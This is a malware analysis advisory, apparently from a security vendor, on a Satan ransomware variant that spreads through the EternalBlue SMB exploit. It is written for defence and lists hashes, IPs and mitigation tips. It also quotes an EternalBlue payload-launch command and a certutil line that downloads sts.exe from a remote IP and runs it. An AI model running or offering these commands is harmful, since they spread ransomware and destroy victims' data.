Satan Ransomware was first seen in January 2017. As with most ‘common’ ransomware families, it had no self-propagation techniques for it to independently infect endpoints on enterprise networks and encrypt files. But this time, EthernalBlue changes the game. This is another WannaCry-like ransomware. The new Satan Ransomware variant was discovered by security researchers from MalwareHunterTeam.

This variant is known to be packed with packer software called PECompact 2. Packer software is a program that compresses a Portable Executable file (e.g. -exe or dll) and a decompressor/decryptor code together into one executable program. There are many commercial and custom-made packers used today by malware authors. Usually they are used to evade memory pattern-based security controls.

The Infection Process:

The initial executable in the infection was seen with name “sts.exe,” which downloads the main Satan payloads (SFX archives, also extracted by the downloader to the infected machine) from a remote malware distribution server (embedded in the Satan code).

“sts.exe” needs the user to click it and execute it. It will then prompt a UAC window, after it downloads the payloads (Client.exe, ms.exe).

  • “Client.exe” – holds the actual ransomware code and runs it once “sts.exe” UAC prompt is enabled.
  • “ms.exe” – will initiate the EternalBlue exploit code, rendering propagation of Satan to unpatched endpoints (CVE-2017-0144, SMBv1) and encrypted files.

Once other machines have been ‘touched’ by Satan, the following command will be executed to download an additional malware helper payload (taken from Blaze’s Security blog):

“cmd /c cd /D C:\Users\Alluse~1\&blue.exe –TargetIp & star.exe –OutConfig a –TargetPort 445 –Protocol SMB –Architecture x64 –Function RunDLL –DllPayload down64.dll –TargetIp”

“down64.dll” is loaded to memory, and executes the following command:

“cmd.exe /c certutil.exe -urlcache -split -f https://198.55.107.149/cab/sts.exe c:/sts.exe&c:\sts.exe”

This will be used for dropping and running “sts.exe” on other machines in the network.

Indicators of Compromise:

File names/hashes:

  • “sts.exe” – sha256: b686cba1894f8ab5cec0ce5db195022def00204f6cd143a325608ec93e8b74ee
  • “Client.exe” – md5: 94868520b220d57ec9df605839128c9
  • “ms.exe” – md5: 770ddc649b8784989eed4cee10e8aa04
  • “down64.dll” – md5: 17f8d5aff617bb729fcc79be322fcb67

Network indicators:

  • hxxp://198.55.107[.]149/cab/sts.exe
  • https://122.114.9.220/data/client.exe
  • https://122.114.9.220/data/ms.exe
  • https://122.114.9.220/data/winlog.exe
  • Known HTTP User Agent: “RookIE/1.0”

Tips for Mitigation:

  • The Cynet Endpoint scanner detects/remediates this threat and its additional binaries at runtime.
  • Make sure to always keep your systems patched!
  • The following directories should be examined:
  • C:\sts.exe
  • C:\Cryptor.exe
  • C:\ProgramData\ms.exe
  • C:\ProgramData\client.exe
  • C:\Windows\Temp\KSession
  • Make sure UAC is enabled.
  • Protect network shares with ACLs, etc.
  • Block the network indicators on organizational FW/Proxies.